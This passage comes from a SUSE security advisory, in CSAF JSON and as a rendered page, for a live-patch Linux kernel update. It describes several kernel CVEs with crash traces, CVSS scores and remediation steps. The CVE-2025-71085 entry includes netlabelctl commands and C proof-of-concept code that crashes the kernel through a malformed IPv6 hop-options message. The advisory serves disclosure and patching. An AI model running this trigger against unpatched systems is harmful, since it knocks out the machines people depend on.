arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40258",
"url": "https://www.suse.com/security/cve/CVE-2025-40258"
},
{
"category": "external",
"summary": "SUSE Bug 1254843 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1254843"
},
{
"category": "external",
"summary": "SUSE Bug 1255053 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1255053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T01:33:43Z",
"details": "important"
}
],
"title": "CVE-2025-40258"
},
{
"cve": "CVE-2025-40284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: MGMT: cancel mesh send timer when hdev removed\n\nmesh_send_done timer is not canceled when hdev is removed, which causes\ncrash if the timer triggers after hdev is gone.\n\nCancel the timer when MGMT removes the hdev, like other MGMT timers.\n\nShould fix the BUG: sporadically seen by BlueZ test bot\n(in \"Mesh - Send cancel - 1\" test).\n\nLog:\n------\nBUG: KASAN: slab-use-after-free in run_timer_softirq+0x76b/0x7d0\n...\nFreed by task 36:\n kasan_save_stack+0x24/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3a/0x60\n __kasan_slab_free+0x43/0x70\n kfree+0x103/0x500\n device_release+0x9a/0x210\n kobject_put+0x100/0x1e0\n vhci_release+0x18b/0x240\n------",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40284",
"url": "https://www.suse.com/security/cve/CVE-2025-40284"
},
{
"category": "external",
"summary": "SUSE Bug 1254860 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1254860"
},
{
"category": "external",
"summary": "SUSE Bug 1257669 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1257669"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T01:33:43Z",
"details": "important"
}
],
"title": "CVE-2025-40284"
},
{
"cve": "CVE-2025-40297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: bridge: fix use-after-free due to MST port state bypass\n\nsyzbot reported[1] a use-after-free when deleting an expired fdb. It is\ndue to a race condition between learning still happening and a port being\ndeleted, after all its fdbs have been flushed. The port\u0027s state has been\ntoggled to disabled so no learning should happen at that time, but if we\nhave MST enabled, it will bypass the port\u0027s state, that together with VLAN\nfiltering disabled can lead to fdb learning at a time when it shouldn\u0027t\nhappen while the port is being deleted. VLAN filtering must be disabled\nbecause we flush the port VLANs when it\u0027s being deleted which will stop\nlearning. This fix adds a check for the port\u0027s vlan group which is\ninitialized to NULL when the port is getting deleted, that avoids the port\nstate bypass. When MST is enabled there would be a minimal new overhead\nin the fast-path because the port\u0027s vlan group pointer is cache-hot.\n\n[1] https://syzkaller.appspot.com/bug?extid=dd280197f0f7ab3917be",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40297",
"url": "https://www.suse.com/security/cve/CVE-2025-40297"
},
{
"category": "external",
"summary": "SUSE Bug 1255187 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255187"
},
{
"category": "external",
"summary": "SUSE Bug 1255895 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255895"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T01:33:43Z",
"details": "important"
}
],
"title": "CVE-2025-40297"
},
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T01:33:43Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T01:33:43Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T01:33:43Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_3-default-12-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T01:33:43Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
}
]
}
SUSE-SU-2026:1102-1
Vulnerability from csaf_suse - Published: 2026-03-27 08:05 - Updated: 2026-03-27 08:05Summary
Security update for the Linux Kernel (Live Patch 8 for SUSE Linux Enterprise 15 SP7)
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel (Live Patch 8 for SUSE Linux Enterprise 15 SP7)
Description of the patch:
This update for the SUSE Linux Enterprise Kernel 6.4.0-150700.53.28 fixes various security issues
The following security issues were fixed:
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).
Patchnames: SUSE-2026-1102,SUSE-SLE-Module-Live-Patching-15-SP6-2026-1102,SUSE-SLE-Module-Live-Patching-15-SP7-2026-1106
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
7.3 (High)
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64 | — |
Vendor Fix
|
|
